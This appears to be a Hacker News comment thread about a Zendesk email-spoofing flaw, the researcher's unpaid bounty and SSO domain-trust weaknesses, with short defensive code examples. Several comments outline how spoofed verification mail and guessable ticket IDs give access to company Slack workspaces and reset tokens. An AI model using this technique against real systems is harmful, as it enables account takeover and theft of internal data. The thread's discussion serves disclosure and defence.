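To make point 2 fail closed, a mail pipeline could refuse privileged actions (like auto-adding CCs) unless the message carries explicit authentication passes. A rough Python sketch, assuming the upstream MTA stamps an RFC 8601 Authentication-Results header; the policy itself is an illustrative assumption, not Zendesk's actual logic:

```python
import email

# Fail-closed check on an inbound message: only take privileged actions
# when SPF and DKIM both explicitly pass. Absence of the header, or any
# result other than an explicit pass, is treated as unauthenticated.

def sender_authenticated(raw_message: bytes) -> bool:
    msg = email.message_from_bytes(raw_message)
    results = msg.get("Authentication-Results", "")
    return "spf=pass" in results and "dkim=pass" in results

spoofed = (b"From: noreply@apple.example\r\n"
           b"Authentication-Results: mx.example; spf=fail\r\n\r\nhi")
assert not sender_authenticated(spoofed)

legit = (b"From: noreply@apple.example\r\n"
         b"Authentication-Results: mx.example; spf=pass; dkim=pass\r\n\r\nhi")
assert sender_authenticated(legit)
```

A production check would parse the header properly and verify alignment with the From domain; the point is only the default: no proof, no privilege.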
It would have been prudent to update HackerOne on the additional finding, but it feels like an easy oversight for a 15-year-old after getting rejected on the first round.
Zendesk should take the higher ground, recognize the mistake, and correct it, not get all "ethical mumbo jumbo."
If you want to understand the dynamics of what happened here, a very important detail is that the bounty hunter's report implicated DKIM and SPF, and no bug bounty program in the world takes DKIM reports seriously. DKIM is the archetypical beg bounty. You could find DKIM RCE and HackerOne would still round file your report.
> Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
Do you find it surprising that they use Microsoft Office too? Paying someone else to handle things like this is cheaper than paying developers and hosting a service like this.
We don't know that it hasn't been, to be honest. State actors and exploit sellers could have known about this bug for years and exploited it before this white hat found it.
A more sensible thing that should've been done is to tokenize the case ID so that you can't just guess it with a numerical range. Also important that you don't leak your key business metrics (# of support cases over time).
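A tokenized case ID is a one-liner with a CSPRNG. A sketch, with a hypothetical address format (not Zendesk's actual scheme):

```python
import secrets

# Replace a guessable auto-incrementing reply address with an unguessable
# token. token_urlsafe(16) yields ~128 bits of entropy, so IDs can't be
# enumerated and ticket volume over time isn't leaked either.

def reply_address(domain: str = "company.zendesk.example") -> str:
    token = secrets.token_urlsafe(16)
    return f"support+id{token}@{domain}"

addr = reply_address()
assert addr.startswith("support+id") and addr.endswith("@company.zendesk.example")
```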
I mean, this existed long before acquisition. Maybe the response could have been different in the past, but there is nothing to indicate that would be true.
> Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
For some reason this like cracked me up. Sounds exactly like something 15 year old me might say :-).
Let’s build our own ticketing system! How hard could it be?
Zendesk handles customer data and says it's a great customer support platform.
The irony is that they have the worst support and some of the worst response times to reported issues. You will find many experiences on LinkedIn reporting this.
This matches my experience with Zendesk. We did an integration at my previous company and they were incredibly naive with respect to email setup. We had quite strict requirements around deliverability in particular, and having the Zendesk setup play nicely with our email domain setup that was tuned for deliverability. Sadly Zendesk were unable to engage with the issue beyond "just forward emails from your gmail support inbox" which was a long way behind where we were.
For a company built on email, they're not good at it.
I swear I’ve seen this vuln years ago. I thought it was already well known that attacker controlled input for email-bridged ticketing systems means attackers can access at least one @company.com email.
I thought this was mainly mitigated by invalidating the assumption that “only authorized employees can control a company email” – it used to be common 5-10 years ago to verify “that you’re an employee” that way, but I just assumed that kind of stopped in favor of whatever SSO/SAML stuff that became popular with enterprise.
You are a sucker if you use a platform like HackerOne. I reported a bug (to a crypto exchange, BitMEX) 5 years ago. It was not a critical bug, but still. The team kept the bug report open for 5 years, I assume so that it wouldn't affect their payout score. They acknowledged the bug. After 5 years they closed it. Zero communication.
If you value your time and your health, don't use these platforms. If companies want security, they can hire people by the hour/day and pay them the relevant wages.
It should be standard for bugs to be made public, or at least disclosed to the affected companies, a while after their discovery, so the companies connected to each other can implement their own fixes. Otherwise, closed-door deals with security researchers, asking them not to reveal the truth, aren't going to prevent bad actors from using the vulnerability. It is times like these that we should reconsider our standards for web security as a whole.
While obviously Zendesk leaving such a huge hole was the main reason for this exploit (you should obviously fail closed when email signals suggest it’s an unauthenticated address), a contributing factor is that Apple forced themselves to be added as an SSO provider.
So the hacks put in place to deal with Google SSO hadn’t been put in place for Apple’s.
Also, what Fortune 500 company is leaving slack’s email based login feature enabled? Why wouldn’t they all be using a corporate SSO solution tied to their company’s slack directory?
How's that "please keep this between us" request working out for them?
Also I think this is a good reminder that using sequential IDs for anything public facing is almost always a bad idea (or at the very least something you should think very hard about). It would be pretty easy to make ticket ID, for example, a sequential 5 digit number followed by 4 random alphanumeric characters. Everyone could still easily refer to the ticket number, but it wouldn't be guessable.
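That hybrid scheme can be sketched as follows; the counter is a plain argument here for illustration, where a real system would use a database sequence:

```python
import secrets
import string

# Human-friendly ticket ID: a sequential 5-digit prefix people can still
# read aloud, plus a 4-character random suffix that makes the full ID
# unguessable, so knowing one ticket number doesn't let you enumerate others.

ALPHABET = string.ascii_uppercase + string.digits

def make_ticket_id(counter: int) -> str:
    suffix = "".join(secrets.choice(ALPHABET) for _ in range(4))
    return f"{counter:05d}-{suffix}"

tid = make_ticket_id(8421)
assert tid.startswith("08421-") and len(tid) == 10
```

With 36^4 ≈ 1.7 million possible suffixes per ticket, brute-forcing a given ticket by email becomes impractical while the visible numbering stays sequential.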
Based on experience of my friend I am inclined to believe that Zendesk is full of shit. She's had bad experience with their Polish site which she described as cultish employer.
This vulnerability in ZD appears to be made worse by ZD's Suspended/Spam feature. There is no indication in the spam queue that there is someone CC'd on the email. So an agent may see a ticket from their customer and approve it. Even when you then view the ticket, there is still no indication there is a CC'd third party unless you 'View original' on the email.
Wait. Did zendesk actually fix the issue, or did they just blacklist a few senders and decide to continue to rely on third party spam filters to save them?
I heard that the Zendesk security team forces your _root_ domain to allow their SSL certificates to be issued, via a CAA DNS record.
I.e. you have the domain support.example.com CNAMEd to Zendesk, so you cannot add any other DNS record at that name; Zendesk would have to do it on their side. But they refuse, and force you to put the CAA record on your root domain, example.com.
The amount of software that could have been a few spreadsheets and an email chain, but that companies pay enormous amounts of money for while creating glaring vulnerabilities in their systems, is a big reason why I'll never understand or thrive in a corporate setting.
Wait - how is that workflow possible and supported?
In my head, authorization under @company.com would be delegated to a central directory, instead of relying on Apple ID. It is effectively an authentication bypass.
Zendesk paid me $500 4 years after I submitted a vulnerability to their bounty program on hackerone. It was a shock. There were default settings indexing internal docs/knowledgebase info to search engines.
I have been thinking about it for a while, but I no longer think email is worth the trouble. I am flooded with spam, the vulnerabilities are everywhere and locking them down near impossible.
Kids who are smart and curious have already been exposed to the internet since they were 8 or 9 years old, so after a few years of learning they're already knowledgeable by the time they're in their teens.
With no responsibilities, all the time in the world to learn, and the right circumstances, they can go far.
Older devs who are experts in this area are already busy making money and working on their employer's security.
I once found a neat trick to hijack Facebook accounts: after MSN Messenger died, a lot of Hotmail accounts were left to die too, but many people had created their Facebook account using the @hotmail address. I tipped them off about it and they basically said F you.
>Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
Ah, yes, why do laymen always think this?
I mean, I get it, Krupp and mining towns used to be a thing, so it is possible.
But every big company should build a ticketing system?
Why not an email solution, OS, network routers too?
Are you not allowed to discuss a vulnerability you found when it is considered out of scope?
I mean it sounds weird to argue that you won't pay, but do not allow the person to talk about it anyway. Even more so if the person communicated with affected companies instead of some darknet marketplace.
Welp, they’re basically begging people to sell 0 days to a 3 letter agency // out of state groups (NSO, etc)
Come on, honor your bug bounty. Especially when it can bite you in the ass hard enough to plummet stock prices if a bug of this caliber is exploited in the companies you serve
My first thought (which is somewhat self-serving because I hate 3rd party sign on) is that this is a great case study for having only one method of sign-in.
lol $0. Companies cutting corners on security also skimp on paying bounties. No surprise there. The only possible exception is crypto bounties: those are much bigger, and there's a greater willingness to pay due to the stakes.
SMH, and Zendesk responds the wrong way on his post. Guys, just pay the kid; instead you're making business owners like me start recommending that our friends and clients avoid Zendesk...
Other providers may not even offer something like this, and it relies on Example Inc. seeking out the identity providers, which seems unreasonable. How do you stop your corporate users signing up for the hot new InstaTwitch gaming app or Grinderble dating service that you have never heard of and using that to authenticate to your sales CRM full of customer data?
When you're setting it up, you can choose what to do with any existing accounts that are part of your domain: kick them out or merge them in.
I don't see this as a vulnerability: how is Google supposed to know that a person has left the company? You let them know by deleting the account.
I don't know if Google is the best example here. Apple might be a better one:
1. User's work email is [email protected]
2. User creates Apple ID using their work email. Their Apple ID is [email protected]
3. User gets fired and their company email is deleted
4. User can still sign in to the SaaS apps using SIWA and their "company" Apple ID
It's worth noting that OAuth providers, like Apple, include information such as whether or not they are authoritative over a particular account.
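Google's OpenID Connect ID tokens are a concrete example of this: the `hd` (hosted domain) claim is only set for Workspace-managed accounts, while a consumer Google account created with a work email gets `email_verified` but no `hd`. A relying party could use that distinction along these lines (a sketch; the claim names are Google's, and the equivalents for other providers are an assumption to verify per provider):

```python
def domain_is_attested(id_token_claims: dict, expected_domain: str) -> bool:
    """Only trust domain membership when the IdP claims to host the domain.

    For Google, `hd` is present only on Workspace-managed accounts; a
    consumer account created with a work email has `email_verified` but
    no `hd`, i.e. the mailbox was only verified at some point in time.
    """
    if not id_token_claims.get("email_verified"):
        return False
    email = id_token_claims.get("email", "")
    if not email.endswith("@" + expected_domain):
        return False
    # The crucial check: the IdP must be authoritative for the domain,
    # not merely have verified the mailbox once.
    return id_token_claims.get("hd") == expected_domain
```

With this check, Bob's lingering consumer Google account from the head comment's scenario would fail the `hd` test even though its email still ends in @example.com.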
If there's a way to do this, I would greatly appreciate a link or brief explanation, as our process for employee termination/resignation does involve disabling in the Google admin portal and if we need to be more proactive I definitely want to know.
There are legitimate reasons for this, e.g. imagine an employee at a company that uses Office365 needing to set up an account for Google Adwords.
So anyone with an example.com email can make a Google account using that email as their login. They verify they have the email and that's their login. A common setup for users who need Google Ads or Analytics.
But when the company disables the 365 login, the Google account remains. And if you use a third-party service that offers "Sign in with Google" and assumes that because you have a Google account ending in "example.com" you are verified as "example.com", you've got access even though the underlying email account is disabled.
If you have the Google admin portal, this doesn't work, as you're controlling the accounts there. But signing up for Microsoft or Apple accounts with that Google Workspace address might have the same loophole.
This is the confusion — it’s reasonable to assume that the email is not a personal address.
I have no idea how this is supposed to work in practice for Github and Gitlab, where people gain access to non-public areas of those websites, but they are still expected to use their own accounts which they keep after leaving their employer.
(The enterprise-managed Github accounts do not address this because they prevent public, upstream collaboration.)
https://support.google.com/accounts/answer/176347?hl=en&co=G...
The reason is obvious: because a Google account gets you access to many a Google service without requiring you to open a Gmail account.
However, the question still stands: why does Google allow authentication with a non-Gmail/Workspace account? Yes, it would be confusing since not all Google Accounts would be made the same, but this entire class of security issues would disappear.
So it's the usual UX convenience vs security.
Alternative "fix" that's both convenient and secure is to have every company use Google Apps on their domain ;-)
Any OAuth provider should send a flag called "attest_identity_ownership" (false, true) as part of the auth flow, set to true if the account is a workspace account or Gmail (or the equivalent for other services), and false if the email is an outside email. The service handling the login could then decide whether to trust the login or proceed otherwise, e.g. by telling the user to use a different OAuth service or an internal mechanism where the identity is attested.
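To make the proposal concrete, here is what the relying-party side could look like. Note that the `attest_identity_ownership` flag is hypothetical; no real OAuth provider sends it today:

```python
from enum import Enum

class LoginDecision(Enum):
    TRUST = "trust"
    REQUIRE_OTHER_AUTH = "require_other_auth"

def handle_oauth_login(token_claims: dict) -> LoginDecision:
    """Relying-party logic for the hypothetical flag described above."""
    if token_claims.get("attest_identity_ownership") is True:
        # Provider is authoritative for this identity right now.
        return LoginDecision.TRUST
    # Provider only proved control of the mailbox at some point in the
    # past; fall back to a mechanism that attests identity today.
    return LoginDecision.REQUIRE_OTHER_AUTH
```

The important property is the default: absent the flag, the login is treated as unattested rather than trusted.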
https://support.zendesk.com/hc/en-us/articles/8187090244506-...
Wow... there was no indication that they even intended on fixing the issue, what was Daniel hackermondev supposed to do? Disclosing this to the affected users probably was the most ethical thing to do. I don't think he posted the vulnerability publicly until after the fix. "Forfeiture of their award" -- they said multiple times that it didn't qualify, they had no intention of ever giving a reward.
For some of our bugs given on h1, we openly say, "Hey, we need to see a POC in order to get this to be triaged." We do not provide test accounts for H1 users, so, if they exploit someone's instance, we'll not only take the amount that the customer paid off of their renewal price, we'll also pay the bounty hunter.
Heads I win, tails you lose.
Edit: to those downvoting, the fact of the matter is that Zendesk's maximum bounty is far lower than 50k; yet OP made 50k; meaning by definition the value of the vulnerability was at least 50k.
THEN the researcher eventually goes public.
Later, Zendesk announces the bug and the fix and says there will be no bug bounty because the researcher went public.
Is that how it went? I mean if so, that's one way to save on bug bounties.
I am 100% certain that every one of the companies that paid the researcher would consider the way this was handled by that researcher "the best alternative to HackerOne rules 'ethical disclosure' in the face of a vendor trying to cover up serious flaws".
In an ideal world, in my opinion HackerOne should publicly revoke Zendesk's account for abusing the rules and rejecting obviously valid bug payouts.
For example, most HackerOne customers exclude denial-of-service issues because they don't want to encourage people to bring down their services with various kinds of flooding attacks. That doesn't mean that the same HackerOne customers (or their customers) wouldn't care about a single HTTP request bringing down the service for everyone for a couple of minutes. Email authentication issues are similar, I think: obviously on-path attacks against unencrypted email have to be out of scope, but if things are so badly implemented that off-path attacks somehow work too, then that really has to be fixed.
Of course, what you really shouldn't do as a HackerOne customer is use it as a complete replacement for your incoming security contact point. There are always going to be scope issues like that, or people unable to use HackerOne at all.
He should have said that since it's not going to be fixed, he will just inform the individual companies.
I'll note he did go to the effort of having the first stab at that sort of resolution, when he pushed back on HackerOne's inaccurate triage of the bug as an SPF/DKIM/DMARC email issue. He clearly understood the need for triage for programs like this, and that the HackerOne internal triage team didn't understand the actual problem, but again was rebuffed.
EDIT: It’s -11 (negative 11) now. Still “0 comments”.
I don't understand what this tries to accomplish. The problem is bad, botching the triage is bad, and the bounty is relatively cheap. I understand that this feels bad from an egg-on-face perspective, but I would much rather be told by a penetration tester about a bug in a third-party service provider than not be told at all just to respect a program's bug bounty policy.
That doesn’t matter if your goal with a bug bounty program is not to have people reporting bugs, but instead to have the company appear to care about security. If your only aim is to appear serious about security, it doesn’t matter what you actually do with any bug reports. Until the bugs are made public, of course, which is why companies so often try to stop this by any means.
But I guess corporations ignoring security for more immediately profitable ventures on the quarterly report is a tale as old as software.
Reading all the many comments, it would appear the damage has been done. Good. But very unnecessary on zd's part.
Another example of impotent PMs, private equity firms meddling and modern software engineering taking a back seat to business interests. Truly pathetic. Truly truly pathetic.
Directory SSO: These are systems like Google Workspace or Okta, which maintain a central directory of users and their access rights.
Non-directory SSO: These are services like "Sign in with Apple" (SIWA) or GitHub authentication, which don't maintain such a directory.
IdentityServer4 [0] is no longer maintained [1] but had SSO support and the source is still on github.
[0] - https://identityserver4.readthedocs.io/en/latest/
[1] - They had to go commercial to stay afloat, there wasn't enough contributions from community/etc. That said it's pretty cheap for what it does in the .NET space.
Whereas you can (and I believe always could*) create an apple ID with any old email address.
*Maybe this delinked situation only came about when they added the App Store to OS X, and figured they'd make less money if they require existing Mac users to get a new email account in order to buy programs in the manner which would grant them a cut.
Apple has a list of all the email addresses for its Apple IDs, but it doesn't control them, and having one deleted doesn't necessarily affect the other.
Google and custom-domain email have always been delinked from this perspective. You could create a Google account with a custom domain and then point the domain elsewhere or lose control of it, and you'd still retain control of the account.
Basically, the required example is essentially theoretical at this point; it only works for employees at companies that also happen to provide SSO services. So if you work at Facebook, Google, Apple, or GitHub and have a [email protected] email address, and you signed into Slack through the SSO affiliated with your company and your company email, then later leave and have your work account access revoked, you won't be able to use that SSO to sign into Slack. That's what they mean by directory control or whatever.
In contrast, if you sign up to GitHub with your work email account, unless the account is managed by your work, your work doesn't actually control it. They just vouched for your affiliation at sign-up when you verified your email. So if you use GitHub SSO to sign up for a service that "verifies" your work email address via GitHub during the process, that won't change when you leave and the company revokes access to the email. GitHub SSO, in this case, isn't verifying that you have an email account @company.com. It is verifying that you once did, or at least once had access to it. This is what they mean by the non-directory whatever.
Similar with Apple, if you were signing in with an @icloud.com, it's pretty good proof, but if you have an Apple ID with a third-party e-mail it's not proof of current control of that e-mail.
That's my guess.
Also, is it impossible to have a Google account with a non-Gmail address? The original poster seemed to be saying that Google _is_ a directory SSO and Apple categorically _is not_. But if you can have a Google account without a Gmail-run email account, wouldn't Google have the same vulnerability?
Google accounts have the exact same issue so I don't understand the distinction made by the OP though.
You can have your own domain if it is a workspace account
This can be done with an account that you once had control over but don't anymore, like if you leave an employer.
You can't send mail from it, but many apps will take having a Google account with a given email as proof of ownership, or an @example.com email address as proof that you are an employee of Example Inc. when they are a customer of the app and have a tenant set up.
I get there's a convenience factor, but even more convenient is the password manager built into every modern browser and smartphone. If the client decides to use bad passwords, that will hurt them whether or not they're using SSO.
The $50k was from other bug bounties he was awarded on hackerone.
It's too bad Zendesk basically said "thanks" but then refused to pay anything. That's a good way to get people not to bother with your bug bounty program. It is often better to build goodwill than to be a stickler for rules and technicalities.
Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
And possibly to have blackhats start looking more closely, since they now know both 1) that whitehats are likely to be focusing elsewhere, leaving more available un-reviewed attack surface, and 2) that Zendesk appears to be the sort of company who'll ignore and/or hide known vulnerabilities, giving exploits a much longer effective working time.
If "the bad guys" discovered this (or if it had been discovered by a less ethically developed 15 year old who'd boasted about it in some Discord or hacker channel) I wonder just how many companies would have had interlopers in their Slack channels harvesting social engineering intelligence or even passwords/secrets/API keys freely shared in Slack channels? And I wonder how many other widely (or even narrowly) used 3rd party SaaS platforms can be exploited via Zendesk in exactly the same way. Pretty much any service that uses the email domain to "prove" someone works for a particular company and then grants them some level of access based on that would be vulnerable to having ZenDesk leak email confirmations to anybody who knows this bug.
Hell, I suspect it'd work to harvest password reset tokens too. That could give you account takeover for anything not using 2FA (which is, to a first approximation over the whole internet, everything).
As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets. I would have expected that the price on the black market for these kind of bugs are several figures larger.
Also the bit about SPF, DKIM and DMARC seems to show a misunderstanding of the issue: these are typically excluded because large companies aren't able to do full enforcement on their email domains due to legacy. It's a common bug report.
In this case, the problem was that Zendesk wasn't validating emails from external systems.
The audacity to say "this is out of scope" then "how dare you tell anyone else" is something else.
Correct, the replies seem to have come from H1 triage and H1 mediation staff.
They often miss the mark like this. I opened a H1 account to report that I'd found privileged access tokens for a company's GitHub org. H1 triage refused to notify the company because they didn't think it was a security issue and ignored my messages.
While it's unclear at which stage Zendesk became involved, in the "aftermath" section it's clear they knew of the H1 report, since they responded there. And later on the post says:
"Despite fixing the issue, Zendesk ultimately chose not to award a bounty for my report. Their reasoning? I had broken HackerOne's disclosure guidelines by sharing the vulnerability with affected companies."
The best case scenario, as I see it, is that Zendesk has a problem they need to fix with their H1 triage process and/or their in- and out-of-scope rules there. And _none_ of that is the researcher's problem.
The worst (and in my opinion most likely) scenario, is that Zendesk did get notified when the researcher asked H1 to escalate their badly triaged denial to Zendesk for review, and Zendesk chose to deny any bounty and tried to hide their vulnerability.
> As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I think it's way worse than that, since internal teams often share logins/secrets/API keys (and details of architecture and networking that a smart blackhat would _love_ to have access to) in their supposedly "internal" Slack channels. I think the fact that non-Zendesk "affected companies" paid out $50k sets that as the absolute lower bound of "the real value of those bugs". And it's _obvious_ that the researcher didn't contact _every_ vulnerable Slack-using organisation. I wonder how much more he could have made by disclosing this to 10 or 100 times as many Slack-using organisations, and delaying/stalling revealing his exploit POC to Zendesk while that money kept rolling in?
I'll be interested to see if HackerOne reacts to this, to avoid the next researcher going for this "second level" of bug bounty payouts by not bothering with H1 or the vulnerable company, and instead disclosing to companies affected by the vulnerability rather than the companies with the vulnerability. It's kinda well known that H1 bug bounties are relatively small, compared to the effort required to craft a tricky POC. But people disclose there anyway, presumably partly out of ethical concerns and partly for the reputation boost. But now we know you can probably get an order of magnitude more money by approaching 3rd-party affected companies instead of cheapskate or outright abusive companies with H1 bounties that they choose to downvalue and not pay out on.
I think it's just laziness. Plus they hire previously famous reporters as the people triaging the reports; those famous people know other famous people first-hand, and they usually think "hmm, unknown guy, must have run a script and submitted this".
I stopped reporting stuff 5 years ago due to the frustration. And it seems the situation is still the same even after so many years.
I believe their logic was that only the domain owner can adequately prevent email spoofing by proper SPF/DMARC configuration, and that it’s the customers’ fault if they don’t do that. Which isn’t entirely wrong.
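For reference, the kind of configuration being alluded to looks roughly like this (illustrative values; the SPF include and the report address are placeholders for whatever a given domain's mail setup actually uses):

```
example.com.         IN TXT  "v=spf1 include:_spf.google.com -all"
_dmarc.example.com.  IN TXT  "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
```

With `p=reject`, receivers are asked to drop mail that fails SPF/DKIM alignment, which is exactly the full enforcement that many large domains struggle to turn on because of legacy senders.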
When you stand up a bug bounty program you get a ton of "I opened developer tools, edited the js on your page, and now the page does something bad" submissions. "I can spoof some email headers and send an email to myself that looks like it is coming from you" isn't something I've specifically seen due to some weird details about my bounty program but it is something I would absolutely expect for many programs to see.
So you need a mechanism to reject this stuff. But if that mechanism is just "triage says this is dumb" you get problems. People scream at you for having their nonsense bug rejected. People submit dozens of very slightly altered "bugs" to try to say "you rejected the last one for reason X but this one does Y." So you create a general policy: anything involving email spoofing is out of scope.
So then a real bug ends up in front of the triage person. They are tired and busy and look at the report and see "oh this relies on email spoofing, close as out of scope." Sucks.
I think that Zendesk's follow up here is crap. They shouldn't be criticizing the author for writing about this bug. But I do very much understand how things end up with a $0 payout for the initial report.
Zendesk wasn't validating the email senders.
> Create an Apple account with [email protected] email and request a verification code, Apple sends verification code from [email protected] to [email protected] and Zendesk automatically creates a ticket
It's a clever attack.
(Of course, if you have ever received e-mail from an address @id.apple.com, you would see the selector name in the DKIM signature header, and could look up the corresponding DKIM record directly. The above method is for when you don't have access to that.)
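The lookup convention mentioned here is standardized (RFC 6376): the DKIM public key lives in a TXT record at `<selector>._domainkey.<domain>`. A trivial helper just to make the naming concrete (the selector value `sel1` in the comment is a made-up example):

```python
def dkim_record_name(selector: str, domain: str) -> str:
    """DNS name holding the DKIM public key (TXT record), per RFC 6376."""
    return f"{selector}._domainkey.{domain}"

# For a signature header containing s=sel1; d=id.apple.com, you would
# query the TXT record at dkim_record_name("sel1", "id.apple.com").
```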
Maybe someone wants to post a link?
Strictly, $0 because he disclosed to customers. But he only disclosed to customers since Zendesk said it was out of scope.
Bad showings all around, for both HackerOne and Zendesk.
Indeed, but just you wait for Zendesk to say "well, _we_ didn't mark it out of scope!", as if delegating it to H1 absolves them of all responsibility.
But simultaneously you should not be able to get into a company Slack by simply having an account with a @company.com email address created by a third-party SSO provider.
In other words, even if Zendesk fixed their problem, Slack would still have a problem on their end.
https://github.com/mdowd79/presentations/blob/main/bluehat20...
The same presentation also mentions (starting slide 17) how the requirements of 0days differs from public research, which is why some vulnerabilities would be difficult to sell.
Don't forget that most people also simply don't sell bugs. They're not for sale in the first place; the bounty would be a thank-you or nice bonus, not a replacement for selling it
I'm certainly not in a criminal bubble so I can't say how big the other side is, but (as a security consultant who knows a reasonable number of hackers) I doubt that I know anyone who'd choose, after getting no response from the company, to sell a bug for profit to a louche party rather than going full disclosure and warning everyone -- or just doing nothing because it's not like it's their problem
Edit: nvm someone did come to mind. We tried to steer them onto the right path at our weekly CTF team meetings but I'm not sure we succeeded. Anywho, still one to a few dozen
Software exploits aren't considered arms; they are information that can be sold. The liability is on the person who does the unauthorized access, the person who steals data, the person who uses the data.
Hacking syndicates distribute liability akin to any corporation
not about anyone else, and especially not for merely browsing or using or buying a legal good from a darknet market
as I wrote
Which is almost always the person finding the bug. Most services include language that limit your ability to find vulnerabilities in their systems as part of being allowed to access their service. If you find the vulnerability without ever accessing the service you might have an out, but that also means you have to sell the exploit with less ability to convince the buyer that it is something significant.
who would then argue they also sold it to security researchers, journalists and assumed everyone was or didnt discriminate or have any intent at all
Same thing happened to me years ago. Interviewed with them and it was the worst “screening” experience I ever had. After getting a rejection email, I thanked them for their time and said I had feedback about the interview should they want to hear it. They said yes, please.
Sent my feedback, never heard from them again.
Proper response would be to update your program to triage these vulns and thank the researcher for not going public straight away. This current approach is burning a tremendous amount of goodwill.
I don’t care if you’re the only company in the market, I’ll still blackball you for this in my recommendations.
Zendesk should pay up, apologize and correct their bug bounty program. After doing so, they should kindly ask the finder to add an update to this post, because otherwise it will follow them around like dogshit under their shoe.
If a company loses 120 million a year to security bounties, they will take into account the cost of scrumming/rapid widget delivery.
They should absolutely inform a client company of a perceived threat, when they agree on the threat
Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
For a better PR response, I think Zendesk could now reward this after realizing it wouldn't have been disclosed first, and admonish HackerOne for not informing them and for the current policies there.
If you are a new user, expect your first couple of reports to be butchered. It seems to me only reports from well-known hackers get carefully analysed.
It's not clear whether they were informed. The mediator's email says "after consultations with *the team*", which is likely referring to Zendesk's security team.
Incredible. This must be some kind of "damaged ego" or ass-covering, as it's clearly not a rational decision.
Edit: Another user here has pointed out the reasoning
> It's owned by private equity. Slowly cutting costs and bleeding the brand dry
1) created for the purpose of either PR/marketing, or a checklist ("auditing"), 2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"
The amusing and ironic thing about the second point is that by doing so, you waste time with the constant spam of people begging for bounties and reporting things that are not even bugs let alone security issues, and your attention is therefore taken away from real security benefits which could be realized elsewhere by talented staff members.
The company even ran special sessions where engineers and hackers were brought together to try to maximize the number of bugs found in a few week period.
It resulted in more secure software at the end and a community of excited researchers trying to make some money and fame on our behalf.
The root cause in this case seems to be that they couldn't get past HackerOne's triage process because Zendesk excluded email from being in scope. This seems more like incompetence than malice on both of their parts. Good that the researcher showed how foolish they were.
That said, putting my security hat on, I have to ask: who thought that sequential ticket IDs in the reply-to email address were a good idea? They really ought to be using long random nonces, at which point the "guess the right id to become part of the support thread" attack falls apart. Classic enumeration + IDOR. So it sounds like there's still potential for abuse here, if you can sneak stuff by their filters.
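One way to implement the "long random nonce" idea without storing anything extra per ticket is to MAC the sequential id into the reply address itself; a sketch under assumed conventions (the secret, the `support+id-tag@` address format, and the domain are all illustrative):

```python
import hmac
import hashlib
from typing import Optional

SECRET_KEY = b"server-side-secret"  # illustrative; load from config in practice

def reply_address(ticket_id: int, domain: str = "support.example.com") -> str:
    """Embed a truncated HMAC of the ticket id in the reply-to address,
    so enumerating sequential ids alone isn't enough to join a thread."""
    tag = hmac.new(SECRET_KEY, str(ticket_id).encode(), hashlib.sha256).hexdigest()[:16]
    return f"support+{ticket_id}-{tag}@{domain}"

def verify_reply_address(address: str) -> Optional[int]:
    """Return the ticket id if the embedded tag is valid, else None."""
    local = address.split("@", 1)[0]
    try:
        _, payload = local.split("+", 1)
        ticket_str, tag = payload.rsplit("-", 1)
    except ValueError:
        return None
    expected = hmac.new(SECRET_KEY, ticket_str.encode(), hashlib.sha256).hexdigest()[:16]
    if hmac.compare_digest(tag, expected):
        return int(ticket_str)
    return None
```

An attacker who guesses the next sequential id still can't produce a valid tag without the server-side key, so inbound mail to a guessed address is simply dropped.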
The implications of being able to read arbitrary email contents from arbitrary domains' support (or otherwise) addresses are well known, and any competent member of Zendesk's security team should know this is exactly what can happen.
Something similar has been discussed on HN before: https://news.ycombinator.com/item?id=38720544 but the overall attack vector of "get a registration email sent to somewhere an attacker can view it" is not novel at all; it's also how some police database websites have been popped in the past (register as @fbi.gov, which automatically gives you access; somehow access the inbox of @fbi.gov due to some public forwarding, for example).
There was a PoC of how to view someone else's ticket (assuming you know the other person's email and approximately when the ticket was filed).
>it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts
It sounds like they got a report saying "I can spoof an email and view someone else's report". Why would they assume the spam protection would protect them when they have a report saying it's not protecting them?
In general, I do expect for the folks reading hackerone reports to make some mistakes; there's a lot of people who will just run a vulnerability scanner and report all the results like they've done something useful. Sometimes for real bugs you have to explain the impact with a good "look what I can do with this."
Also, the poster didn't share their submission with us, just the responses, so it's hard to know how clear they were to Zendesk. A good bug with a bad explanation I would not expect to get paid.
I'm not sure. Anybody that keeps up to date with security (e.g. those working in a security team) should know that ticketing systems also contains credentials sometimes. For example when Okta was breached, the main concern was that Okta support tickets contain.... session tokens, cookies, and credentials!
https://www.bleepingcomputer.com/news/security/okta-says-its...
What's the point of having a security team that can't connect external incidents to their own system? Relearning mistakes that are already well known?
The company did fix the issue a few months later, so there's that.
It’s an imperfect system I agree - but it’s the best we have
- handled with priority, but sometimes it takes a couple of weeks for a more definite fix
- handled by the security department within the company ( to forward to relevant PO's and to follow up)
The unfortunate thing about bug bounties is that you will be hammered by crawlers, which can sometimes even resemble a DDoS
you mean your product will be hammered by people testing to find holes, thus garner the bounty? or some other reason?
Eg. Testing all vulnerable wp plugin paths on all domains. Multiple times a minute
It doesn’t make sense, companies with less revenue aren’t the ones doing this. It’s usually the richer tech companies.
Because for some reason, it's larger tech companies that love to bean-count their way through security.
So my argument is that it does not matter how much they spend on security they will get hacked anyway, only thing they can do is keep spending in check and limit scope of hacks.
A great blog post on the matter https://www.troyhunt.com/beg-bounties/
Edit: nevermind, I see what you mean. Twitter embeds work, direct images don't.
I'll give an "another side" perspective. My company was much smaller. Out of 10+ "I found a vulnerability" emails I got last year, all were something like mass-produced emails generated based on an automated vulnerability scanning tool.
Investigating all of those for "is it really an issue" is more work than it seems. For many companies looking to improve security, there are higher ROI things to do than investigating all of those emails.
[0] - https://sqlite.org/forum/forumpost/53de8864ba114bf6
In one specific instance, we had 20 emails in a single month about a specific Wordpress PHP endpoint that had a vulnerability, on a separate marketing site on another domain. The thing is, our Wordpress contractor had already replaced it with a static page as part of the default install, but it was still returning 200.
